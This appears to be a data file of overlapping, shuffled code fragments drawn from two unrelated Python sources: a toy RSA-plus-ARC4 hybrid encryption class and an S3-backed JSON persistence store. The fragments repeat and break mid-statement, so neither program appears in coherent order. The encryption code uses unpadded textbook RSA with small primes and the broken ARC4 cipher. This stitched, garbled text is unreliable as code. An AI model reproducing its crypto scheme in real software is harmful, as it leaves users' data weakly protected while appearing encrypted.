"= pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p =",
"int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N)",
"m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c,",
"not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c):",
"= params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message",
"self.q = q self.N = N self.phi = phi self.e = e self.d",
"self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q =",
"pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p']",
"import ARC4 def gcd(a, b): while b != 0: a, b = b,",
"params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey,",
"= p self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1,",
"= 1 while True: c = n * i + 1 if(c %",
"other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class",
"self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d):",
"self.phi = phi self.e = e self.d = d def get_pub(self): return (self.N,",
"= n * i + 1 if(c % a == 0): c =",
"message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'],",
"self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q",
"def imod(a, n): i = 1 while True: c = n * i",
"def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q,",
"cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain =",
"encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey,",
"k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message):",
"= self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537",
"= q self.N = N self.phi = phi self.e = e self.d =",
"def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA:",
"1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self):",
"cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class",
"self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d): self.p",
"res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p",
"arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0",
"return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return",
"self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d)",
"imod(a, n): i = 1 while True: c = n * i +",
"Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N']",
"phi self.e = e self.d = d def get_pub(self): return (self.N, self.e) def",
"__init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi =",
"enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] )",
"if(c % a == 0): c = c//a break i = i+1 return",
"from arc4 import ARC4 def gcd(a, b): while b != 0: a, b",
"import base64 import binascii from secrets import token_hex from rsa import prime from",
"tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher =",
"self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def",
"a % b return a def lcm(a, b): return a * b //",
"SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p == q:",
"import token_hex from rsa import prime from arc4 import ARC4 def gcd(a, b):",
"self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d",
"gcd(a, b): while b != 0: a, b = b, a % b",
"!= 0: a, b = b, a % b return a def lcm(a,",
"e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N,",
"= params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d =",
"message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher",
"= params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message)",
"arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256):",
"base64 import binascii from secrets import token_hex from rsa import prime from arc4",
"= (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict(",
"self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__",
"isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res",
"(self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e,",
"= int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d,",
"bit_length=256): p, q = 0, 0 while p == q: p = prime.getprime(bit_length)",
"self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N,",
"def load(self, p, q, N, phi, e, d): self.p = p self.q =",
"lcm(a, b): return a * b // gcd(a, b) def imod(a, n): i",
"b return a def lcm(a, b): return a * b // gcd(a, b)",
"self.d) def load(self, p, q, N, phi, e, d): self.p = p self.q",
"while True: c = n * i + 1 if(c % a ==",
"self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return",
"i = 1 while True: c = n * i + 1 if(c",
"encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1],",
"q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q",
"= ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key)",
"user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1]",
"self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey =",
"return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain",
"self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d): self.p =",
"N, phi, e, d): self.p = p self.q = q self.N = N",
"other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def",
"self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537 self.d =",
"q = prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi",
"def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message",
"c//a break i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key)",
"m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0])",
"return a def lcm(a, b): return a * b // gcd(a, b) def",
"self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m,",
"= prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi =",
"b, a % b return a def lcm(a, b): return a * b",
"= arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0,",
"self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p,",
"if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self,",
"imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self,",
"1 while True: c = n * i + 1 if(c % a",
"= d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def",
"params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return",
"= arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ == \"__main__\": pass",
"True: c = n * i + 1 if(c % a == 0):",
"self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k,",
"a def lcm(a, b): return a * b // gcd(a, b) def imod(a,",
"(user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key,",
"= q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1)",
"token_hex from rsa import prime from arc4 import ARC4 def gcd(a, b): while",
"1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q,",
"load(self, p, q, N, phi, e, d): self.p = p self.q = q",
"p self.q = q self.N = N self.phi = phi self.e = e",
"arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key =",
"prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi = lcm(self.p",
"0: a, b = b, a % b return a def lcm(a, b):",
"0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p =",
"b): while b != 0: a, b = b, a % b return",
"ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q",
"q, N, phi, e, d): self.p = p self.q = q self.N =",
"user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key)",
"n): i = 1 while True: c = n * i + 1",
"i + 1 if(c % a == 0): c = c//a break i",
"i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return",
"arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher):",
"= 0, 0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length)",
"= params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self,",
"a, b = b, a % b return a def lcm(a, b): return",
"self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e",
"self.e, self.d) def load(self, p, q, N, phi, e, d): self.p = p",
"p, q = 0, 0 while p == q: p = prime.getprime(bit_length) q",
"= arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key",
"= N self.phi = phi self.e = e self.d = d def get_pub(self):",
"- 1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def",
"self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message):",
"time import base64 import binascii from secrets import token_hex from rsa import prime",
"import binascii from secrets import token_hex from rsa import prime from arc4 import",
"arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 =",
"gcd(a, b) def imod(a, n): i = 1 while True: c = n",
"self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e =",
"e, d): self.p = p self.q = q self.N = N self.phi =",
"self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d)",
"self.e = e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self):",
"c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params):",
"import prime from arc4 import ARC4 def gcd(a, b): while b != 0:",
"message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key",
"def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key =",
"from secrets import token_hex from rsa import prime from arc4 import ARC4 def",
"d): self.p = p self.q = q self.N = N self.phi = phi",
"c = c//a break i = i+1 return c def arc4_encrypt(key, message): arc4",
"while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p",
"= b, a % b return a def lcm(a, b): return a *",
"== q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q =",
"dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N,",
"def lcm(a, b): return a * b // gcd(a, b) def imod(a, n):",
"def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def",
"token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message)",
"d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self,",
"other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ ==",
"message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4",
"return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m =",
"phi, e, d): self.p = p self.q = q self.N = N self.phi",
"params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d']",
"n * i + 1 if(c % a == 0): c = c//a",
"a == 0): c = c//a break i = i+1 return c def",
"= self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey",
"arc4 import ARC4 def gcd(a, b): while b != 0: a, b =",
"b // gcd(a, b) def imod(a, n): i = 1 while True: c",
"= e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return",
"while b != 0: a, b = b, a % b return a",
"% b return a def lcm(a, b): return a * b // gcd(a,",
"0, 0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p",
"def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m,",
"plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p",
"= lcm(self.p - 1, self.q - 1) self.e = 65537 self.d = imod(self.e,",
"binascii from secrets import token_hex from rsa import prime from arc4 import ARC4",
"self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537 self.d",
"p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q",
"N self.phi = phi self.e = e self.d = d def get_pub(self): return"
] |
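The second list shuffles windows over a toy hybrid-encryption module: a schoolbook `SimpleRSA` class (key generation via `prime.getprime`, `e = 65537`, and `d` obtained from a brute-force modular inverse `imod`), whose `Cipher` subclass wraps each message with a fresh `token_hex` session key, RSA-encrypts that key for the peer, and ARC4-encrypts the payload. `rsa.prime` and `arc4.ARC4` are third-party imports, so the dependency-free sketch below reconstructs only the number theory; the tiny demo primes and `e = 17` are substitutions (the fragments' `e = 65537` would exceed phi at this toy size).

```python
def gcd(a, b):
    # Euclid's algorithm, as in the fragments.
    while b != 0:
        a, b = b, a % b
    return a

def lcm(a, b):
    return a * b // gcd(a, b)

def imod(a, n):
    # Brute-force modular inverse from the fragments: scan multiples of n
    # until n*i + 1 is divisible by a, so (a * result) % n == 1.
    # pow(a, -1, n) (Python 3.8+) is the practical replacement.
    i = 1
    while True:
        c = n * i + 1
        if c % a == 0:
            return c // a
        i += 1

# Demo with small, insecure primes; real keys need hundreds of bits.
p, q = 61, 53
N = p * q                    # 3233
phi = lcm(p - 1, q - 1)      # Carmichael lambda, matching the fragments' lcm
e = 17
d = imod(e, phi)             # 413; e*d = 7021 = 9*780 + 1
m = 42
assert pow(pow(m, e, N), d, N) == m   # encrypt then decrypt round-trips
```

Using `lcm(p-1, q-1)` (the Carmichael function) rather than `(p-1)*(q-1)` is a valid choice for the decryption exponent, though the linear-scan `imod` would be hopelessly slow at the 256-bit prime sizes the fragments generate.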
[
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"<<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3",
"store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client",
"Data, it uses AWS S3 as of now as data store.\"\"\" def __init__(self,",
"creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to",
"KIND, either express or implied. # See the License for the specific language",
"limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store",
"Unless required by applicable law or agreed to in writing, software # distributed",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"# See the License for the specific language governing permissions and # limitations",
"client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data =",
"self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict()",
"License. # You may obtain a copy of the License at # #",
"if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename,",
"src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save",
"s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data =",
"# limitations under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence",
"self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s",
"SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data,",
"\"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect()",
"not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data)",
"law or agreed to in writing, software # distributed under the License is",
"from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to",
"now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client",
"the License for the specific language governing permissions and # limitations under the",
"= AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name,",
"update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with",
"# connect after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected():",
"or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect",
"compliance with the License. # You may obtain a copy of the License",
"__init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client",
"to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data",
"store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS,",
"# # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging",
"as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"uses AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize",
"this file except in compliance with the License. # You may obtain a",
"import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery",
"S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger",
"2020 Red Hat Inc. # # Licensed under the Apache License, Version 2.0",
"connect after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.',",
"you may not use this file except in compliance with the License. #",
"rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore:",
"json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated",
"to save Bigquery Data, it uses AWS S3 as of now as data",
"dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not",
"store to save Bigquery Data, it uses AWS S3 as of now as",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"= dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if",
"exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to",
"self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise",
"else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self,",
"if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,",
"ANY KIND, either express or implied. # See the License for the specific",
"Copyright © 2020 Red Hat Inc. # # Licensed under the Apache License,",
"region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload",
"in compliance with the License. # You may obtain a copy of the",
"if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data:",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"# Copyright © 2020 Red Hat Inc. # # Licensed under the Apache",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"use this file except in compliance with the License. # You may obtain",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"not use this file except in compliance with the License. # You may",
"governing permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>>",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename):",
"connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename)",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or",
"Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated file Succefully!')",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"# \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from",
"as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if",
"s3 bucket.\"\"\" # connect after creating or with existing s3 client self.s3_client.connect() if",
"json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data",
"\"\"\"Persistence store to save Bigquery Data, it uses AWS S3 as of now",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"© 2020 Red Hat Inc. # # Licensed under the Apache License, Version",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS S3",
"s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else:",
"OF ANY KIND, either express or implied. # See the License for the",
"def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client =",
"permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>> #",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"# you may not use this file except in compliance with the License.",
"DataProcessing object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client =",
"s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not",
"for the specific language governing permissions and # limitations under the License. #",
"agreed to in writing, software # distributed under the License is distributed on",
"after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable",
"json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename)",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws",
"of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing object.\"\"\" self.s3_client =",
"(the \"License\"); # you may not use this file except in compliance with",
"using S3.\"\"\" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS",
"= self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')",
"object.\"\"\" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3(",
"<NAME> <<EMAIL>> # \"\"\"Implementation persistence store using S3.\"\"\" import logging from rudra.data_store.aws import",
"= logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it uses AWS",
"s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data",
"# # Unless required by applicable law or agreed to in writing, software",
"express or implied. # See the License for the specific language governing permissions",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"# Unless required by applicable law or agreed to in writing, software #",
"except in compliance with the License. # You may obtain a copy of",
"aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\"",
"filename='collated.json'): \"\"\"Upload s3 bucket.\"\"\" # connect after creating or with existing s3 client",
"by applicable law or agreed to in writing, software # distributed under the",
"AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: \"\"\"Persistence store to save Bigquery Data, it",
"AWS S3 as of now as data store.\"\"\" def __init__(self, s3_client=None): \"\"\"Initialize DataProcessing",
"Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get",
"under the License. # # Author: <NAME> <<EMAIL>> # \"\"\"Implementation persistence store using",
"logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__)",
"with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to",
"either express or implied. # See the License for the specific language governing",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
